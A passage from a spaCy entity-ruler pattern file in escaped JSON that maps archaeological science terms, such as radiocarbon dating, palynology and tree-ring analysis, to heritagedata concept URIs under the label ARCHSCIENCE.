\"feldspar\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142138\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ferrous\"},\r\n\t\t\t{\"LOWER\": \"metal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142139\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fibre\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142140\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fission\"},\r\n\t\t\t{\"LOWER\": \"track\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148433\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"flot\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142141\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"flotation\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142142\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fluorine,\"},\r\n\t\t\t{\"LOWER\": \"uranium\"},\r\n\t\t\t{\"LOWER\": \"and\"},\r\n\t\t\t{\"LOWER\": \"nitrogen\"},\r\n\t\t\t{\"LOWER\": \"tests\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170619\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"foraminifera\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142167\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fossilised\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142144\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"fungal\"},\r\n\t\t\t{\"LOWER\": \"damage\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144513\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"gamma\"},\r\n\t\t\t{\"LOWER\": \"spectrometry\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144518\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"geological\"},\r\n\t\t\t{\"LOWER\": \"sediment\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142145\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"gold\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142146\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"hair\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142147\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"hand\"},\r\n\t\t\t{\"LOWER\": \"retrieval\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148434\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"heavy\"},\r\n\t\t\t{\"LOWER\": \"residue\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142148\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"human\"},\r\n\t\t\t{\"LOWER\": \"aspects\"}\r\n\t\t] \r\n 
},\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170621\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"human\"},\r\n\t\t\t{\"LOWER\": \"osteology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142149\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"hydrolysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142151\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"irsl\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142151\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"irsl\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142150\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"impression\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142151\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"infra-red\"},\r\n\t\t\t{\"LOWER\": \"stimulated\"},\r\n\t\t\t{\"LOWER\": \"luminescence\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142152\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"inorganic\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142153\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"investigative\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142154\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ivory\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142155\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"lead\"},\r\n\t\t\t{\"LOWER\": \"isotope\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142156\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"leather\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142157\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"loss\"},\r\n\t\t\t{\"LOWER\": \"on\"},\r\n\t\t\t{\"LOWER\": \"ignition\"},\r\n\t\t\t{\"LOWER\": \"determination\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144511\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"luminescence\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142158\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"magnetic\"},\r\n\t\t\t{\"LOWER\": \"susceptibility\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142159\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"manufacturing\"},\r\n\t\t\t{\"LOWER\": \"debris\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142160\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": 
[\r\n\t\t\t{\"LOWER\": \"material\"},\r\n\t\t\t{\"LOWER\": \"type\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142161\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"metal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142162\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"method\"},\r\n\t\t\t{\"LOWER\": \"of\"},\r\n\t\t\t{\"LOWER\": \"recovery\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/147276\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"micro-charcoal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142183\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"microfossils\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142164\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"micromorphology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142165\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"microscopy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142166\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineral\"},\r\n\t\t\t{\"LOWER\": \"preserved\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142167\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineral\"},\r\n\t\t\t{\"LOWER\": \"replaced\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142167\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineralised\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142169\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mineralogy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142170\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"mitochondrial\"},\r\n\t\t\t{\"LOWER\": \"dna\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142171\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"modification\"},\r\n\t\t\t{\"LOWER\": \"state\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/147277\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"moisture\"},\r\n\t\t\t{\"LOWER\": \"content\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142172\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"multi-element\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142173\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"natural\"},\r\n\t\t\t{\"LOWER\": \"aspects\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142174\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"non-ferrous\"},\r\n\t\t\t{\"LOWER\": \"metal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": 
\"http://purl.org/heritagedata/schemes/560/concepts/142175\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"non-metric\"},\r\n\t\t\t{\"LOWER\": \"traits\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142177\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"osl\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142176\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"obsidian\"},\r\n\t\t\t{\"LOWER\": \"hydration\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142177\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"optically\"},\r\n\t\t\t{\"LOWER\": \"stimulated\"},\r\n\t\t\t{\"LOWER\": \"luminescence\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170621\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"osteoarchaeology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142178\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"oxygen\"},\r\n\t\t\t{\"LOWER\": \"isotope\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170620\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"palaeoentomology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170613\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"palaeoenvironmental\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170612\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"palynology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142179\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"particle\"},\r\n\t\t\t{\"LOWER\": \"size\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142180\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"pathology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142980\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"peat\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/147278\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"peat\"},\r\n\t\t\t{\"LOWER\": \"humification\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142181\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ph\"},\r\n\t\t\t{\"LOWER\": \"determination\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142182\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"physical\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142183\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"phytolith\"}\r\n\t\t] \r\n 
},\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142184\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"plant\"},\r\n\t\t\t{\"LOWER\": \"damage\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142185\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"polarised\"},\r\n\t\t\t{\"LOWER\": \"light\"},\r\n\t\t\t{\"LOWER\": \"microscopy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142186\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"pollen\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144523\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"polymineral\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142187\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"potassium\"},\r\n\t\t\t{\"LOWER\": \"argon\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144516\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"pottery\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144520\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"quartz\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"radiocarbon\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148434\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"residue\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142189\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"roundwood\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142191\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"s.e.m.\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142191\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"sem\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142191\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"scanning\"},\r\n\t\t\t{\"LOWER\": \"electron\"},\r\n\t\t\t{\"LOWER\": \"microscopy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142193\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"shell\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142194\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"silicified\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142195\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"silver\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142196\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"skin\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": 
\"http://purl.org/heritagedata/schemes/560/concepts/170642\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"slag\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142197\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"soil\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142198\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"specialist\"},\r\n\t\t\t{\"LOWER\": \"sampling\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142199\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"spot\"},\r\n\t\t\t{\"LOWER\": \"test\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142200\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"stable\"},\r\n\t\t\t{\"LOWER\": \"isotope\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142201\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"stratigraphic\"},\r\n\t\t\t{\"LOWER\": \"description\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142203\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tl\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142202\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tephrochronology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142203\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"thermoluminescence\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142205\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tool\"},\r\n\t\t\t{\"LOWER\": \"marked\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142205\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tool\"},\r\n\t\t\t{\"LOWER\": \"marks\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142207\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tooth\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142208\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"total\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142209\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tree-ring\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142209\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tree-ring\"},\r\n\t\t\t{\"LOWER\": \"studies\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142979\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"tufaceous\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n 
